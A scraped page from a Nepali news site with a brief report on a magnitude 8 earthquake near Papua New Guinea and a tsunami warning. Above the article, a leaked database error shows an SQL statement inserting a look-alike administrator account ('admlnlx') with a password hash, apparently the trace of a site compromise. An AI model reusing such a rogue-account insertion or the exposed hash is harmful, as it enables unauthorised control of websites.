WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bm/x2HFHQlLrnsBlLQbCBlL0iX6Ywx/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 00:44:41', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
पपुवान्युगिनीमा ८ रेक्टरको भूकम्प, सुनामीको चेतावनी – Gaule Khabar

पपुवान्युगिनीमा ८ रेक्टरको भूकम्प, सुनामीको चेतावनी

पपुवान्युगिनीमा ८ रेक्टरको भूकम्प, सुनामीको चेतावनी

काठमाडौं,माघ ९ –

पपुवा न्युगिनीमा ८ रेक्टर स्केलको शक्तिशाली भूकम्प गएको छ । भूकम्पका कारण सुनामी आउन सक्ने चेतावनी दिइएको छ ।अमेरिकी भौगर्भिक सर्वेक्षणका अनुसार सोलोमन द्विपको १६७ मिटर गहिराईमा भूकम्प गएको छ ।नेपाली समय अनुसार आइतबार बिहान सवा १० बजे भूकम्प गएको हो । भूकम्पको क्षतिको विवरण आइसकेको छैन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका